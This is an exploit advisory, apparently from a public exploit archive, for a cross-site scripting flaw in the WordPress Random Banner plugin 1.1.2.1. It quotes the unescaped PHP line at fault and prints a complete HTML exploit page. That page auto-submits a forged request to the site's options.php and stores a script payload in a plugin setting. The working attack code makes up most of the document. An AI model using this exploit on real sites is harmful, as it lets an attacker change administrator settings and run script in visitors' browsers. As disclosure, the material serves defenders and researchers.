WordPress Random Banner plugin version 1.1.2.1 suffers from a cross site scripting vulnerability.
e8a222f00b2cb3c827d697cdf2819d9c4faa1ca71c06198bca0754f355c5833d
######################
# Exploit Title : Wordpress random-banner.1.1.2.1 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/random-banner/
# Software Link :
http://downloads.wordpress.org/plugin/random-banner.1.1.2.1.zip
# Date : 2014-06-28
# Tested on : Windows 7 / Mozilla Firefox
######################
# Vulnerable code :
<input placeholder="Link for that image" type="text" size="25"
name="buffercode_RBanner_url_banner1" value="<?php echo
get_option('buffercode_RBanner_url_banner1') ?>" />
######################
Exploit Code:
<html>
<body>
<form name="post_form" method="post"
action="http://localhost/wp-admin/options.php">
<input type='hidden' name='option_page'
value='buffercode_RBanner_settings_group' /><input type="hidden"
name="action" value="update" /><input type="hidden" id="_wpnonce"
name="_wpnonce" value="1d67ba2e9e" /><input type="hidden"
name="_wp_http_referer"
value="/wp-admin/options-general.php?page=random-banner%2Frandom-banner.php&settings-updated=true"
/>
<input placeholder="Link for that image" type='hidden' size="25"
name="buffercode_RBanner_url_banner1"
value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>
#####################
Discovered By : ACC3SS
#####################